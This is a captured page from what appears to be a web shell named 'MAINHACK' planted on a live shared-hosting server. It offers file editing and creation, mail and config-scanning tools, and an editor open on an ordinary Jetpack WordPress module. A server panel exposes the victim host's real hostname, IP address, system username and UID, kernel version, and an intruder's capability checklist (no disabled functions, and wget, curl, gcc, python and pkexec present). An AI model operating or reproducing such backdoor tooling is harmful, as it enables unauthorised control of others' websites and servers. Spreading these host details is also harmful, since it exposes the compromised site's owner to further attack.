[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: related-posts.php
<?php //phpcs:ignore WordPress.Files.FileName.InvalidClassFileName /** * Module Name: Related posts * Module Description: Automatically display related articles to keep visitors reading longer. * First Introduced: 2.9 * Sort Order: 29 * Recommendation Order: 9 * Requires Connection: Yes * Auto Activate: No * Module Tags: Recommended * Feature: Engagement * // phpcs:ignore WordPress.WP.CapitalPDangit.MisspelledInComment * Additional Search Queries: related, jetpack related posts, related posts for wordpress, related posts, popular posts, popular, related content, related post, contextual, context, contextual related posts, related articles, similar posts, easy related posts, related page, simple related posts, free related posts, related thumbnails, similar, engagement, yet another related posts plugin, creator */ class Jetpack_RelatedPosts_Module { /** * Class variables * * @var Jetpack_RelatedPosts_Module */ private static $instance = null; /** * Singleton implementation * * @return object */ public static function instance() { if ( ! is_a( self::$instance, 'Jetpack_RelatedPosts_Module' ) ) { self::$instance = new Jetpack_RelatedPosts_Module(); } return self::$instance; } /** * Register actions and filters * * @uses add_action, add_filter */ private function __construct() { add_action( 'jetpack_module_loaded_related-posts', array( $this, 'action_on_load' ) ); } /** * This action triggers if the module is in an active state, load related posts and options. * * @uses Jetpack_RelatedPosts::init, is_admin, Jetpack::enable_module_configurable, Jetpack_Sync::sync_posts */ public function action_on_load() { require_once __DIR__ . '/related-posts/jetpack-related-posts.php'; Jetpack_RelatedPosts::init(); if ( is_admin() ) { Jetpack::enable_module_configurable( __FILE__ ); } // Load Customizer controls. if ( class_exists( WP_Customize_Manager::class ) && class_exists( WP_Customize_Control::class ) ) { require_once __DIR__ . '/related-posts/class.related-posts-customize.php'; } } } // Do it. Jetpack_RelatedPosts_Module::instance();
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: premium707.web-hosting.com
Server IP: 198.177.120.115
PHP Version: 8.1.34
Server Software: LiteSpeed
System: Linux premium707.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
HDD Total: 97.87 GB
HDD Free: 76.38 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: urbaoubp
User ID (UID): 1252
Group ID (GID): 1257
Script Owner UID: 1252
Current Dir Owner: 1252